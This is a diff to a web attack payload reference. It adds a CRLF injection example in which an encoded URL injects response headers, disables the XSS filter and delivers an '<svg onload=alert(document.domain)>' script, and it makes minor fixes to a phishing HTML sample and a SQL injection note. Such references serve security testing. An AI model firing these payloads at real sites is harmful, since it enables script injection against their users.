CRLF injection updated

CRLF injection/README.md

@@ -15,7 +15,7 @@ Connection: keep-alive
 Content-Length: 178
 Content-Type: text/html
 Date: Mon, 09 May 2016 14:47:29 GMT
-Location: https://www.example.net/
+Location: https://www.example.net/[INJECTION STARTS HERE]
 Set-Cookie: mycookie=myvalue
 X-Frame-Options: SAMEORIGIN
 X-Sucuri-ID: 15016
@@ -23,6 +23,34 @@ x-content-type-options: nosniff
 x-xss-protection: 1; mode=block
 ```
 
+## CRLF - Add a cookie - XSS Bypass
+Requested page
+```
+http://example.com/%0d%0aContent-Length:35%0d%0aX-XSS-Protection:0%0d%0a%0d%0a23%0d%0a<svg%20onload=alert(document.domain)>%0d%0a0%0d%0a/%2f%2e%2e
+```
+HTTP Response
+```
+HTTP/1.1 200 OK
+Date: Tue, 20 Dec 2016 14:34:03 GMT
+Content-Type: text/html; charset=utf-8
+Content-Length: 22907
+Connection: close
+X-Frame-Options: SAMEORIGIN
+Last-Modified: Tue, 20 Dec 2016 11:50:50 GMT
+ETag: "842fe-597b-54415a5c97a80"
+Vary: Accept-Encoding
+X-UA-Compatible: IE=edge
+Server: NetDNA-cache/2.2
+Link: <https://example.com/[INJECTION STARTS HERE]
+Content-Length:35
+X-XSS-Protection:0
+
+23
+<svg onload=alert(document.domain)>
+0
+```
+
+
 ## CRLF - Write HTML
 Requested page
 ```
@@ -39,8 +67,8 @@ Content-Type: text/html
 Last-Modified: Mon, 27 Oct 2060 14:50:18 GMT
 Content-Length: 34
 
-<html>You have been Phished</html>```
-
+<html>You have been Phished</html>
+```
 
 ## CRLF - Filter Bypass
 Using UTF-8 encoding
@@ -58,3 +86,4 @@ Remainder:
 
 ## Thanks to
 * https://www.owasp.org/index.php/CRLF_Injection
+* https://vulners.com/hackerone/H1:192749

SQL injection/README.md

@@ -20,6 +20,7 @@ Unicode character U+02BA MODIFIER LETTER DOUBLE PRIME (encoded as %CA%BA) was
 transformed into U+0022 QUOTATION MARK (")
 Unicode character U+02B9 MODIFIER LETTER PRIME (encoded as %CA%B9) was
 transformed into U+0027 APOSTROPHE (')
+Wildcard (*)
 ```